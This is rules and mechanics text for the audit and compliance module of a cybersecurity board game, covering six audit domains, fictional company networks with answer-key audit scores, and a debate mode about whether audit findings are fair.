Option C: Create Fictional Network via Narrative - Threat Orchestrator describes a scenario: "Your organization has email, web, database, and domain controller servers. Some are on-prem, some in cloud. You have a firewall but no IDS." - Teams audit based on description - Faster, requires less setup
Threat Orchestrator (Acting as External Auditor) reviews the network and assesses 6 audit domains:
Audit Question: "Does your network properly isolate critical systems from untrusted networks?"
Pass Criteria: - Implemented segmented architecture (3+ zones), AND - Deployed firewall between zones, AND - Critical systems (Database, Domain Controller) in separate zone from internet-facing systems
Fail Criteria: - Flat network (no segmentation), OR - Segmentation without firewall, OR - Critical systems on same zone as untrusted systems
If FAIL - Finding: - Name: Network Segmentation Gap - Risk Level: CRITICAL - Consequence in IR: Lateral movement easier (-1 to defending against NETWORK attacks) - Consequence in DR: Attacker access spreads to more systems (-10 DR budget penalty)
Narrative for Teams: "All of your systems are on the same network segment. Once an attacker gains access to one system, they can move freely between others."
Audit Question: "Is your identity system (directory services, authentication, authorization) properly secured?"
Pass Criteria: - Domain Controller deployed, AND - Domain Controller on separate network segment, AND - Domain Controller not overloaded (≤2 services)
Fail Criteria: - No Domain Controller deployed, OR - Domain Controller on same segment as untrusted systems, OR - Domain Controller overloaded (3+ services)
If FAIL - Finding: - Name: Identity System Vulnerability - Risk Level: CRITICAL - Consequence in IR: Credential-based attacks easier (-1 to defending against CREDENTIAL_ABUSE attacks) - Consequence in DR: Full credential compromise; all user accounts compromised (-15 DR budget penalty)
Narrative for Teams: "Your identity system is overloaded with too many services and insufficient hardening. If compromised, attackers will have broad access to all user credentials."
Audit Question: "Can you detect attacks when they happen? Do you have monitoring and alerting?"
Pass Criteria: - IDS or IPS deployed, AND/OR - SIEM system deployed, AND/OR - Email Gateway + Honeypot deployed (detection alternatives)
Fail Criteria: - None of the above detection systems deployed, OR - Only basic security devices with no central logging
If FAIL - Finding: - Name: Detection & Monitoring Gap - Risk Level: HIGH - Consequence in IR: Investigations slower (-1 to Investigation rolls; 12+ instead of 11+) - Consequence in DR: Breach undetected longer; more data stolen (-10 DR budget penalty)
Narrative for Teams: "You have no centralized logging or monitoring. When an attack happens, you won't know about it until data is already compromised."
Audit Question: "Do you have functional backups? Can you recover from data loss or ransomware?"
Pass Criteria: - Backup System deployed, AND - Backup isolated on separate network, OR - Cloud backup configured, OR - Multiple hosting locations (on-prem + cloud redundancy)
Fail Criteria: - No Backup System deployed, OR - Single point of failure (all on-prem or all cloud)
If FAIL - Finding: - Name: Backup & Recovery Gap - Risk Level: CRITICAL (for ransomware/DR only) - Consequence in IR: None (network gap, not detection issue) - Consequence in DR: Ransomware unrecoverable; full rebuild required (-25 DR budget penalty)
Narrative for Teams: "You have no backup strategy. If ransomware hits, you cannot recover your data. You must either pay ransom or rebuild from scratch."
Audit Question: "Are your cloud systems and third-party integrations properly secured and isolated?"
Pass Criteria: - Cloud systems isolated on private network (VPN), AND - Cloud systems monitored/managed, AND - Credentials for cloud access securely managed
Fail Criteria: - Cloud systems internet-exposed, OR - No monitoring of cloud services, OR - Credentials stored locally for cloud access
If FAIL - Finding: - Name: Cloud Security Gap - Risk Level: HIGH - Consequence in IR: Cloud-based attacks easier (-1 to defending against WEB_EXPLOIT attacks) - Consequence in DR: Cloud compromise requires cloud provider recovery; slow remediation (-20 DR budget penalty)
Narrative for Teams: "Your cloud systems are internet-accessible without protection. Any attacker can directly target your cloud infrastructure."
Audit Question: "Do you have centralized logging, monitoring, and security operations capability?"
Pass Criteria: - SIEM system deployed, OR - Email Gateway + IDS deployed (combined monitoring)
Fail Criteria: - No SIEM or equivalent centralized logging
If FAIL - Finding: - Name: Security Operations Gap - Risk Level: MEDIUM - Consequence in IR: Investigations slower (-1 to Investigation rolls) - Consequence in DR: Forensic analysis slow; can't determine breach scope (-5 DR budget penalty)
Narrative for Teams: "You have no centralized place to view security events. When an attack happens, investigators must pull data from multiple sources manually."
After all 6 domains are assessed, Threat Orchestrator produces an Audit Findings Report:
SECURITY AUDIT FINDINGS REPORT
Organization: [Name]
Assessment Date: [Date]
Framework: [Framework used]
Auditor: [Your name / External firm]
═══════════════════════════════════════════
DOMAIN ASSESSMENT SUMMARY:
✓ PASS - Network Segmentation & Isolation
Observation: Network properly segmented with firewalls between zones.
Assessment: Risk is LOW for lateral movement.
✗ FAIL - Access Control & Identity Management
Finding: Domain Controller overloaded with excessive services.
Risk: If DC compromised, entire identity system at risk.
Severity: CRITICAL
Recommendation: Isolate DC to minimal required services.
✓ PASS - Threat Detection & Incident Response
Observation: SIEM system deployed with centralized logging.
Assessment: Good detection capability.
✗ FAIL - Backup & Disaster Recovery
Finding: No backup system deployed.
Risk: Data loss unrecoverable; ransomware response limited to ransom/rebuild.
Severity: CRITICAL
Recommendation: Deploy backup system immediately.
✓ PASS - Third-Party Risk & Cloud Security
Observation: Cloud systems properly isolated on private network.
Assessment: Cloud security posture adequate.
✗ FAIL - Security Operations & Monitoring
Finding: No centralized logging platform.
Risk: Incident investigation will be slow and manual.
Severity: HIGH
Recommendation: Deploy SIEM or equivalent centralized logging.
═══════════════════════════════════════════
FINAL SCORE: 3/6 DOMAINS PASS
Overall Assessment: CONCERNING GAPS IDENTIFIED
Summary: Organization has adequate network and cloud security but lacks:
1. Proper identity system isolation
2. Backup/recovery capability
3. Centralized monitoring
Impact Estimate:
- If attack occurs: Detection delayed, recovery impossible without ransom
- Estimated cost to remediate findings: ~$40K (modest investment)
- Estimated cost of breach due to these gaps: ~$500K+ (significant exposure)
Recommendation Priority:
1. Deploy backup system (prevent ransomware catastrophe)
2. Isolate Domain Controller (prevent credential compromise)
3. Centralize logging (speed up incident response)
PASS/FAIL per domain (X/6) is the primary score. Star ratings (1-5★) are flavor for narrative reports, with this fixed mapping:
1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL
Optional (v2.2): a 5★ (exemplary) rating in Detection grants +1 to Incident Response investigation rolls if IR is played later.
Teams receive a score reflecting their infrastructure quality:
| Score | Assessment | Interpretation |
|---|---|---|
| 6/6 PASS | Enterprise-Grade | No modifiers carried into later modules; strong foundation |
| 5/6 PASS | Strong Security | -1 modifier to one attack type in IR |
| 4/6 PASS | Adequate Security | -1 modifier to two attack types in IR |
| 3/6 PASS | Concerning Gaps | -1 modifier to three attack types; IR easier |
| Below 3/6 | High Risk | Multiple -1 modifiers; IR much easier; DR much costlier |
6/6 Pass: "Your organization demonstrates strong security practices across all domains. While no system is perfect, you have implemented key controls and best practices."
4-5/6 Pass: "Your organization has good foundational security but should prioritize remediation of identified gaps. Most critical systems are protected, but some exposure remains."
3/6 Pass: "Your organization has significant security gaps that create real risk. Multiple critical domains require attention. If an incident occurs, you will face challenges."
Below 3/6: "Your organization has critical gaps across multiple domains. Significant investment needed to meet baseline security standards."
When audit findings exist and other modules are played:
Each FAIL finding creates a -1 modifier (one per gap — canonical, v2.2) to the relevant roll:
| Audit Finding | IR Modifier | Affected Threat Type |
|---|---|---|
| Segmentation Gap | -1 to NETWORK defenses | Lateral movement attacks easier |
| Identity Gap | -1 to CREDENTIAL_ABUSE defenses | Credential attacks easier |
| Detection Gap | -1 to Investigation rolls | Finding threats takes longer (11+ becomes 12+) |
| Backup Gap | No IR effect | (Matters in Disaster Recovery) |
| Cloud Gap | -1 to WEB_EXPLOIT defenses | Web/API attacks easier |
| Operations Gap | -1 to Investigation rolls | Forensic investigation slower |
Example: Segmentation Gap Active in IR
INCIDENT RESPONSE PHASE:
Team's Threat: Lateral Movement via SMB
Base roll needed: 11+
Audit Modifier: -1 (Segmentation Gap)
Effective roll needed: 12+
Team's Defense: Network Segmentation (newly deployed)
Roll: 14 + 2 (justification) = 16
Result: SUCCESS (16 ≥ 12)
TO Narrative: "Your network segmentation worked perfectly, stopping the
lateral movement that would have been trivial in an unsegmented network."
Each FAIL finding is a penalty subtracted from the DR starting budget (this table is canonical — v2.2):
| Audit Finding | DR Budget Penalty |
|---|---|
| Segmentation Gap | -10 Budget (attacker spreads to more systems) |
| Identity Gap | -15 Budget (full credential compromise) |
| Detection Gap | -10 Budget (dwell time longer; more data stolen) |
| Backup Gap | -25 Budget (no recovery option; expensive rebuild) |
| Cloud Gap | -20 Budget (cloud provider recovery needed) |
| Operations Gap | -5 Budget (forensic investigation slow) |
Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.
Example: Multiple Gaps in DR (v2.2)
DISASTER RECOVERY PHASE:
Teams start with 50 crisis budget (DR 50; for reference, IR starts at 100).
Audit Failures from earlier assessment:
- Segmentation Gap: -10
- Detection Gap: -10
- Backup Gap: -25
Raw Gap Penalty: -45 -> capped at -30
Available Crisis Budget: 50 - 30 = 20
With 20 Budget the team can still afford the mandatory beats
(cheapest mandatory path is 29 -> they must lean on the free
Holding Statement and skip actions), but the response will be
thin. Outcome: heavy pressure, likely reputation damage.
Recommended Flow: Audit → Incident Response
Identify 3-5 gaps in network
Generate Modifiers (2 minutes)
Each gap becomes a -1 modifier to relevant defense in IR
Play Incident Response (35-40 minutes)
Teams gain appreciation for audit value
Debrief (10 minutes)
Recommended Flow: Audit → [Incident Response] → Disaster Recovery
Identify gaps (particularly Backup Gap and Detection Gap)
Skip or Lose IR (optional)
Assume attackers breached and incident was NOT detected
Play Disaster Recovery (30-35 minutes)
Teams discover detection gap = dwell time was 48+ hours
Debrief (10 minutes)
Play Just the Audit Module (as independent learning)
Network Characteristics: - Flat network (no segmentation) - Email, web, database on same servers (overloaded) - No backup system - No SIEM or monitoring - All on-premises
Expected Audit Result: - 1-2/6 domains pass - Multiple CRITICAL findings - High remediation cost - Team learns value of basics (backup, monitoring)
Network Characteristics: - Segmented network with firewall - Dedicated servers for critical functions - Backup system present - IDS deployed but no SIEM - Hybrid on-prem/cloud
Expected Audit Result: - 4/6 domains pass - 2 MEDIUM findings (monitoring, cloud config) - Moderate remediation cost - Team learns importance of comprehensive monitoring
Network Characteristics: - Fully isolated network architecture - Dedicated hardened servers - Comprehensive backup strategy - SIEM + IDS deployed - Cloud properly secured
Expected Audit Result: - 5-6/6 domains pass - 0-1 minor findings - Low remediation cost - Team learns value of comprehensive program
Focus audit on specific compliance requirement: - PCI-DSS: Focus on payment card handling, encryption, access control - HIPAA: Focus on healthcare data protection, audit logs, access management - SOC 2: Focus on security, availability, confidentiality controls - GDPR: Focus on data protection, breach notification, privacy
Each framework has different pass/fail criteria.
Run audit multiple times with team improvements: 1. Initial audit (baseline) 2. Team makes improvements based on findings 3. Follow-up audit (measure improvement) 4. Calculate improvement % and cost-benefit
Instead of compliance framework, audit against specific threat profile: - "This organization faces nation-state threat" → Audit for advanced detection - "This organization handles PHI data" → Audit for healthcare security - "This organization processes credit cards" → Audit for PCI-DSS - "This organization is critical infrastructure" → Audit for resilience
| Domain | PASS Meaning | FAIL Consequence (IR) | FAIL Consequence (DR) |
|---|---|---|---|
| Segmentation | Good isolation | -1 to NETWORK defense | -10 budget |
| Identity | Proper AC | -1 to CREDENTIAL_ABUSE defense | -15 budget |
| Detection | Good monitoring | -1 to Investigation | -10 budget |
| Backup | Recovery capable | None | -25 budget |
| Cloud | Secure cloud | -1 to WEB_EXPLOIT defense | -20 budget |
| Operations | Good logging | -1 to Investigation | -5 budget |
Cap (v2.2): total DR budget penalty capped at -30. Star flavor mapping: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL.
cards/audit-compliance/core-deck/audit-domain-cards.md and cards/audit-compliance/README.md are regenerated from it. One-off mechanics that existed nowhere else ("+5 turn penalty", "+1 escalation point", "-2 modifier", "+1 difficulty") are deleted or folded into the canonical -1-per-gap rule.Audit & Compliance Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/standalone-games/audit-compliance.md
Version: 2.2 - Playtest Edition — answer keys now follow the printed criteria; PASS/FAIL (X/6) is the primary score (stars: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL). See docs/rules/module-audit-compliance.md for the canonical modifier table.
Compliance Audit Standalone offers three distinct game modes that can be played independently:
Common Theme: Teams understand how audits find vulnerabilities that attackers will exploit.
Best For: - Standalone 20-35 minute sessions - Teaching audit frameworks - Understanding security gaps - Before/after comparison with the Incident Response module - Competitive assessment skills
Duration: 15-25 minutes
Players: 1-4 teams
Difficulty: Easy (low cognitive load)
Best For: Quick session, first-time audit introduction
"Three organizations have submitted their infrastructure for audit. Review each one and score their security posture. Which has the best design? Which is most vulnerable?"
Teams receive 3 pre-built network descriptions and audit them against a 6-domain framework. Compare results and discuss why vulnerabilities matter.
INFRASTRUCTURE DESCRIPTION:
Startup Tech is a 50-person web development company.
Cloud-first approach, minimal on-premises systems.
DEPLOYMENT:
- Web Server (Cloud - AWS): Hosts company website and app portal
- Database Server (Cloud - AWS RDS): Customer data, 100K records
- Development Server (Cloud - AWS EC2): Dev/test environment
- Domain Controller (On-Prem): AD for user identity (1 small server)
- File Server (On-Prem): Shared documents
- Email Server (Cloud - Microsoft 365): Email via SaaS provider
SECURITY DEVICES:
- Email Gateway: None (using Microsoft 365 default)
- Firewall: AWS Security Groups (cloud provider native)
- IDS/IPS: None
- SIEM: None
- WAF: None
- Backup: AWS automated snapshots + Microsoft 365 retention
- VPN: None (all cloud-native, no remote access needed)
NETWORK ARCHITECTURE:
- Hybrid (50% Cloud, 50% On-Prem)
- Cloud systems accessible via internet (all public IP)
- On-prem systems on isolated LAN
- No network segmentation between cloud and on-prem
HOSTING:
- 50% AWS (web, database, dev)
- 50% On-Premises (AD, file sharing)
SECURITY POSTURE:
- No perimeter firewall monitoring
- Cloud infrastructure: AWS default security (basic)
- On-prem infrastructure: Minimal controls
- Identity: Single AD instance (critical point)
- No incident detection
- Backups functional but not tested
INFRASTRUCTURE DESCRIPTION:
Mid-Market Corp is a 200-person financial services company.
Balanced on-premises and cloud, mature IT operations.
DEPLOYMENT:
- Email Server (On-Prem): Exchange 2019
- Web Server (Cloud - Azure): Public website + customer portal
- Database Server (On-Prem): SQL Server, customer data, 1M records
- File Server (On-Prem): Network file shares, active collaboration
- Domain Controller (On-Prem): AD + LDAP, 200 users
- Development Server (Cloud - Azure): Dev/test
- Backup System (On-Prem): Backup appliance, off-site replication
- Legacy System (On-Prem): 15-year-old accounting system
SECURITY DEVICES:
- Firewall: Cisco ASA (perimeter) + internal segmentation firewall
- Email Gateway: Proofpoint (phishing/malware filter)
- IDS: Suricata (network-based detection)
- IPS: None (IDS only)
- SIEM: Splunk (centralized logging)
- WAF: AWS WAF (in front of web server)
- VPN: Cisco AnyConnect (remote access)
- Honeypot: None
NETWORK ARCHITECTURE:
- Segmented (3 zones: DMZ, Internal, Finance)
- Firewalls enforce zone boundaries
- On-prem systems segregated from cloud
- Cloud systems on private network (not public internet)
HOSTING:
- 40% On-Premises (core business systems)
- 60% Cloud (web, dev, supplementary)
SECURITY POSTURE:
- Perimeter monitoring active (IDS)
- Email filtering active
- Centralized logging (SIEM)
- Remote access controlled (VPN)
- Backup and recovery tested
- Legacy system isolated but unpatched
INFRASTRUCTURE DESCRIPTION:
Enterprise Bank is a 1000+ person financial institution.
Highly regulated (PCI-DSS, HIPAA), on-premises focused.
DEPLOYMENT:
- Email Server (On-Prem): Custom hardened system + redundancy
- Web Server (Cloud/Hybrid): DMZ layer for customer portal
- Database Server (On-Prem): Oracle RAC, 500M+ records, air-gapped
- File Server (On-Prem): Multiple redundant file servers by department
- Domain Controller (On-Prem): Multiple DCs, LDAP + Kerberos, hardened
- Development Server (On-Prem): Isolated dev network, no access to prod
- Backup System (On-Prem): Multiple backup systems, offline vault, geographically distant
- Cloud Workload (Limited): Only non-sensitive workloads
SECURITY DEVICES:
- Firewall: Multiple Palo Alto networks (perimeter + internal + cloud boundary)
- Email Gateway: Proofpoint + internal inspection
- IDS: Multiple IDS systems (network + host-based)
- IPS: Palo Alto IPS (active blocking)
- SIEM: Splunk + IBM QRadar (redundant)
- WAF: F5 WAF (multi-layer)
- VPN: Multiple VPN concentrators, MFA required
- Honeypot: Internal honeypot network (3 decoy systems)
- Network Segmentation: Microsegmentation between critical systems
- Intrusion Prevention: Advanced threat prevention
NETWORK ARCHITECTURE:
- Fully Isolated (10+ security zones)
- Each zone has firewall enforcement
- Zero-trust network access
- Air-gapped critical systems
- Private clouds only (no public internet access)
HOSTING:
- 95% On-Premises (regulatory requirement)
- 5% Cloud (non-critical, isolated)
SECURITY POSTURE:
- Comprehensive logging (multiple SIEM)
- Advanced threat detection (IDS/IPS + honeypot)
- Incident response ready
- Backup and recovery tested quarterly
- All systems hardened per NIST guidelines
- Compliance audited annually (PCI-DSS, SOX)
Teams assess each network using this framework. Scoring (v2.2): PASS/FAIL per domain (X/6) is the primary score. If you use star ratings for flavor, the fixed mapping is 1-2★ = FAIL, 3★+ = PASS, "PARTIAL" counts as FAIL.
Question: "Are critical systems isolated?"
| Score | Criteria |
|---|---|
| PASS | Firewall between zones OR microsegmentation active |
| FAIL | Flat network OR segmentation without enforcement |
Question: "Is identity management secure?"
| Score | Criteria |
|---|---|
| PASS | Dedicated Domain Controller, MFA for remote access, minimal over-privilege |
| FAIL | No DC OR DC overloaded OR no MFA OR broad admin access |
Question: "Can you detect attacks?"
| Score | Criteria |
|---|---|
| PASS | IDS/IPS or SIEM deployed, covering all critical segments |
| FAIL | No IDS/IPS and no SIEM, OR a critical segment sits outside detection coverage |
Question: "Can you recover from failure?"
| Score | Criteria |
|---|---|
| PASS | Backup system deployed + tested + geographically diverse |
| FAIL | No backup OR untested backup OR single location |
Question: "Are cloud/vendor systems managed?"
| Score | Criteria |
|---|---|
| PASS | Cloud systems isolated OR not handling critical data |
| FAIL | Cloud systems on internet + handling sensitive data + no WAF |
Question: "Do you have centralized visibility?"
| Score | Criteria |
|---|---|
| PASS | SIEM deployed + centralized logging active |
| FAIL | No SIEM OR no centralized logging |
AUDIT WORKSHEET
Organization audited: ______________________ Auditing team: ______________________
Domain PASS/FAIL Key finding (one line)
1. Network Segmentation [ ] ______________________________________
2. Access Control & Identity [ ] ______________________________________
3. Incident Detection & Response [ ] ______________________________________
4. Backup & Disaster Recovery [ ] ______________________________________
5. Third-Party Risk Management [ ] ______________________________________
6. Security Ops & Monitoring [ ] ______________________________________
SCORE: ____ / 6 PASS (PARTIAL counts as FAIL; stars: 1-2* = FAIL, 3*+ = PASS)
TOP 3 RECOMMENDATIONS:
1. ___________________________________________________________________________
2. ___________________________________________________________________________
3. ___________________________________________________________________________
TO explains: "You're security auditors reviewing three organizations' infrastructure designs. For each, you'll score them on a 6-domain framework. Your goal: Identify which has the strongest security posture and which is most vulnerable."
For each network (Startup, Mid-Market, Enterprise):
Teams answer: 1. "Which organization is most secure?" 2. "Which is most vulnerable to attack?" 3. "If you HAD to use one network, which would you choose?"
| Domain | Score | Finding |
|---|---|---|
| Network Segmentation | FAIL | No firewall between cloud and on-prem; cloud accessible from internet |
| Access Control | FAIL | Dedicated AD exists, but no MFA anywhere (cloud consoles are remote access) — "no MFA" is a FAIL condition |
| Detection | FAIL | No IDS/IPS or SIEM |
| Backup & Recovery | FAIL | AWS snapshots + M365 retention exist but are untested — "untested backup" is a FAIL condition |
| Third-Party Risk | FAIL | Cloud systems public internet-accessible, holding customer data, no WAF |
| Operations | FAIL | No centralized monitoring |
Score: 0/6 PASS (strict). A lenient auditor might award Access Control a narrow PASS — dedicated, single-purpose DC and no VPN/remote-access paths to on-prem — for 1/6. Either reading lands in the same tier: Below 3/6, HIGH RISK. (The judgment call itself is a great Variation C debate.)
Risk Rating: HIGH / CRITICAL - Vulnerabilities: No network segmentation, no detection capability, no MFA, untested backups, cloud systems exposed - Attack Scenario: Attacker compromises cloud web server → lateral movement to on-prem AD → full network access; if ransomware hits, the untested backups may not restore - Cost of Breach: Very high (no detection, no segmentation to contain, recovery uncertain)
| Domain | Score | Finding |
|---|---|---|
| Network Segmentation | PASS | Firewalls between DMZ, Internal, Finance zones |
| Access Control | PASS | AD hardened, VPN with MFA |
| Detection | FAIL | IDS + SIEM deployed, but detection-only (no IPS blocking) and the isolated legacy accounting segment sits outside IDS coverage — a blind spot at the highest-risk, unpatched system |
| Backup & Recovery | PASS | Backup appliance with off-site replication, tested |
| Third-Party Risk | PASS | Cloud systems on private network, WAF in place |
| Operations | PASS | SIEM + centralized logging |
Score: 5/6 PASS
Risk Rating: MEDIUM - Strengths: Good segmentation, logging, backups - Weaknesses: Legacy accounting system (unpatched, and unmonitored — the Detection FAIL) - Attack Scenario: Attacker may get into DMZ but segmentation blocks lateral movement; an attack routed through the legacy segment, however, could go undetected - Cost of Breach: Moderate (segmentation limits damage; the legacy blind spot is the residual risk)
| Domain | Score | Finding |
|---|---|---|
| Network Segmentation | PASS | Microsegmentation between all critical systems |
| Access Control | PASS | Hardened DCs, MFA, minimal over-privilege |
| Detection | PASS | IDS/IPS + dual SIEM + honeypot |
| Backup & Recovery | PASS | Multiple offline vaults, quarterly testing |
| Third-Party Risk | PASS | Cloud only for non-critical, extensive monitoring |
| Operations | PASS | Dual SIEM, air-gapped logging |
Score: 6/6 PASS
Risk Rating: LOW - Strengths: Defense-in-depth across all domains - Weaknesses: Very expensive to operate; regulatory complexity - Attack Scenario: Multiple layers would have to be bypassed; honeypot would alert SOC immediately - Cost of Breach: Lower (but incident response costs are high due to complexity)
| Score | Assessment | Implication |
|---|---|---|
| 6/6 PASS | Enterprise-grade | Highest security, highest cost |
| 5/6 PASS | Strong security | Balanced security & cost |
| 3-4/6 PASS | Adequate but gapped | Risk exposure present |
| Below 3/6 | High risk | Vulnerabilities likely exploited |
Which team's audit assessment was most accurate? - Teams that scored Startup as high-risk: +1 point - Teams that scored Enterprise as low-risk: +1 point - Teams that identified Legacy System as Mid-Market's weakness: +1 point
Winner: Team with most accurate audit assessments
Answer: No detection, no segmentation, cloud exposed
"If you had to recommend improvements to Startup, what's priority #1?"
Answer: Network segmentation OR IDS/SIEM (detection)
"Why is Enterprise Bank so expensive?"
Answer: Redundancy, microsegmentation, multiple layers of defense
"Which organization would you actually want to work for?"
Duration: 25-35 minutes
Players: 1-4 teams
Difficulty: Medium (requires both building and auditing)
Best For: Combined learning, deeper understanding
"Each team builds a simplified network by drawing random infrastructure cards. Then you audit each other's networks. Better auditors find more gaps."
This combines elements of Network Building (simplified) with Audit mechanics. Teams make trade-off decisions, then their network design is audited by competitors.
Each team builds a network using a simplified card deck:
SERVER CARDS (Draw 5 cards, must include certain types): - Email Server (must have) - Web Server (must have) - Database Server (must have) - Domain Controller (should have) - Backup System (optional) - Development Server (optional) - File Server (optional) - Cloud Workload (optional)
SECURITY DEVICE CARDS (Draw 3 cards, choose to deploy or skip): - Firewall - IDS - SIEM - Email Gateway - WAF - Honeypot
ARCHITECTURE CARD (Draw 1, determines layout): - Flat Network (budget-friendly, weak) - Segmented Network (balanced) - Fully Isolated (expensive, strong)
Rules: - Must have: Email, Web, Database - Can choose: Others - Budget: Implicit (each card represents a choice; no money tracking) - Time: 10 minutes to decide and document on "Network Card"
Each team creates a Network Card:
TEAM A'S NETWORK:
SERVERS:
✓ Email Server
✓ Web Server
✓ Database Server
✓ Domain Controller
✓ Backup System
✓ File Server
✗ Development Server (skipped)
SECURITY DEVICES:
✓ Firewall
✓ IDS
✗ SIEM (skipped)
✓ Email Gateway
✗ WAF (skipped)
✗ Honeypot (skipped)
ARCHITECTURE:
→ Segmented (3 zones)
Each team audits a different team's network (round-robin):
Example Audit of Team A:
AUDIT OF TEAM A'S NETWORK:
Domain 1: Network Segmentation
Decision: Segmented (3 zones) → PASS
Finding: Good segmentation between DMZ, Internal, Sensitive
Domain 2: Access Control
Decision: Domain Controller present → PASS
Finding: Identity management in place
Domain 3: Detection
Decision: IDS present but NO SIEM → PARTIAL FAIL
(v2.2: "PARTIAL" counts as FAIL for the score)
Finding: Can detect network attacks but no centralized logging for correlation
Domain 4: Backup & Recovery
Decision: Backup System present → PASS
Finding: Can recover from data loss
Domain 5: Third-Party Risk
Decision: No WAF on Web Server → FAIL
Finding: Web server vulnerable to application attacks
Domain 6: Operations
Decision: No SIEM → FAIL
Finding: No centralized monitoring; incident response slower
AUDIT SCORE: 3/6 PASS
CRITICAL FINDINGS:
1. Missing SIEM (no centralized logging)
2. No WAF (web server unprotected)
3. IDS without SIEM (detection blindspot)
Accuracy of Audits is Scored:
| Audit Accuracy | Points |
|---|---|
| Identified all major gaps | +5 |
| Identified some gaps | +3 |
| Missed critical gap | -2 |
| Incorrect assessment | 0 |
Team Scores: - Building Teams: Score = (6 - number of fails) × 5 - Example: 3/6 PASS = 3 fails → 3 × 5 = 15 points - Auditing Teams: Score = accuracy of audit assessment
Winner: Highest combined score OR winner of each category
Duration: 20-30 minutes
Players: 2-4 teams
Difficulty: High (requires critical thinking & argumentation)
Best For: Advanced teams, strong discussion-based learning
"You're given a network design and audit findings. As a team, debate whether the auditor's findings are FAIR, HARSH, or MISSING SOMETHING. Win by making the most convincing argument."
This is a debate game where teams argue the merits of audit findings, teaching that audits are interpretable and that defending infrastructure requires understanding the rationale.
(Same fictional company as Variation A's "Startup Tech": 50 people, cloud-first, no VPN.)
SCENARIO:
Startup Tech built this network:
- Email (Cloud), Web (Cloud), Database (Cloud),
Domain Controller (On-Prem), Backup (Cloud snapshots)
- No Firewall between cloud and on-prem
- No IDS or SIEM
- No VPN (all cloud-native; cloud consoles protected by
provider logins only, no MFA)
AUDITOR'S FINDINGS:
Domain 1: Network Segmentation → FAIL
"No firewall between cloud and on-prem represents
uncontrolled lateral movement risk."
Domain 3: Detection → FAIL
"No IDS/SIEM means attacks go undetected."
OVERALL: HIGH RISK
STARTUP'S COUNTERARGUMENT:
"We use cloud providers (AWS/Azure) which have built-in
firewalls at the cloud level. Cloud provider security
groups mean only the services we expose are reachable.
Our small team (50 people) means we're faster to respond.
This audit is too harsh for a startup."
YOUR JOB:
- Is the auditor FAIR? (reasonable standards)
- Is the auditor HARSH? (too strict for context)
- Is the auditor MISSING gaps? (what should they have found?
Hint: no MFA, untested backups)
- Vote: Fair / Harsh / Missing / Balanced
SCENARIO:
Mid-Market Corp has this system:
- 15-year-old Accounting System (on-prem)
- Runs on Windows Server 2003 (unsupported, unpatched)
- Handles $2B in transactions annually
- Cannot be replaced for 2+ years (licensing/training)
- Isolated on separate network segment but bridged for
month-end consolidation
AUDITOR'S FINDINGS:
Domain 2: Access Control → FAIL
"Legacy system runs on unsupported OS. Vulnerability
present = critical risk."
Domain 4: Backup & Recovery → PARTIAL
"System backed up but no tested recovery procedure."
OVERALL: CRITICAL RISK (specifically legacy system)
CORP'S COUNTERARGUMENT:
"The system is air-gapped except for 3 days per month.
We have detective controls (IDS) watching for suspicious
access. The cost of replacement ($2M) is greater than
our risk tolerance. This system is a known risk we're
accepting."
YOUR JOB:
- Is the auditor RIGHT to flag this?
- Is the corporation taking reasonable risk?
- How would you rate this scenario? Risk Acceptance vs. Negligence?
- Vote: Auditor Correct / Corp Reasonable / Need More Controls / Acceptable Risk
SCENARIO:
Enterprise Bank built this network:
- 10+ security zones with microsegmentation
- Dual SIEM systems (Splunk + QRadar)
- IDS + IPS on every zone
- Honeypot network with decoys
- All systems hardened per NIST
- Quarterly disaster recovery testing
- Air-gapped offline backups in vault
- Annual compliance audit (PCI-DSS, SOX)
COST: $5M annual IT security budget
AUDITOR'S FINDINGS:
Domain 1-6: ALL PASS ✓
AUDITOR'S COMMENT:
"Exceptional security posture. Well-engineered
defense-in-depth. Highly resilient. Recommended
best practices for financial institution."
STAKEHOLDER QUESTION:
"Is this over-engineered? Could we achieve 80%
of the security with 30% of the cost?"
YOUR JOB:
- Is defense-in-depth always justified?
- What's the cost-benefit breakpoint?
- For different organization types (startup vs. bank),
what's appropriate?
- Vote: Over-Engineered / Justified / Right for Context / Too Expensive
TO reads: 1. Organization and network design 2. Auditor's findings 3. Organization's counterargument 4. Debate question
Each team gets assigned a position: - Team A: Defend the Auditor (findings are fair/necessary) - Team B: Defend the Organization (counterargument is valid) - Team C: Play Neutral Assessor (judge fairness of both)
Teams prepare arguments: - 2-3 key points supporting their position - Anticipate opponent's counterarguments - Use security/business logic
Structure: 1. Auditor Position: 1 minute opening (Team A) 2. Organization Position: 1 minute opening (Team B) 3. Cross-Examination: 2 minutes (back-and-forth) 4. Neutral Assessment: Team C (judge who had better argument)
Team C Scores: - Most convincing argument: +3 points - Better use of logic: +2 points - Anticipated counterarguments: +2 points - Clearer presentation: +1 point
Repeat for each scenario (3 scenarios = 3 rounds)
AUDITOR POSITION (Team A): "The findings are fair because: 1. Network security standards apply to all organizations 2. Cloud provider firewalls don't replace organizational controls 3. No IDS means breaches go undetected for weeks 4. A $10M breach destroys a startup; prevention is essential"
ORGANIZATION POSITION (Team B): "The counterargument is valid because: 1. Startups operate under different constraints than enterprises 2. Cloud provider security groups limit what's exposed 3. Our cloud provider has better security than we could build 4. For 50 employees, a $50K security investment is proportional 5. We're risk-accepting; this is a known trade-off"
CROSS-EXAMINATION (back and forth):
A: "But if you get compromised, your customer data is exposed. Isn't that a problem?"
B: "Yes, but our cloud provider's controls AND limited data make that less likely than you're suggesting."
A: "What about detection? If you're breached, you won't know for months."
B: "True, but adding SIEM costs $5K/month that we don't have. We're choosing early detection (IDS) instead of centralized logging."
C (NEUTRAL): "Who made the better argument?" - Team A cited industry standards - Team B cited resource constraints - Both had merit
VERDICT: Team B made slightly more convincing argument (better contextualization of risk) - Team B: +3 points - Team A: +2 points
After 3 scenarios:
| Team | Scenario 1 | Scenario 2 | Scenario 3 | TOTAL |
|---|---|---|---|---|
| Team A (Auditor) | 2 | 3 | 2 | 7 |
| Team B (Organization) | 3 | 2 | 2 | 7 |
| Team C (Neutral) | 3 | 2 | 3 | 8 |
Winner: Team C (Neutral Assessor)
Award: "Best Critical Thinking"
Answer: No; context matters (startup vs. bank)
"How would you defend an audit finding to the board?"
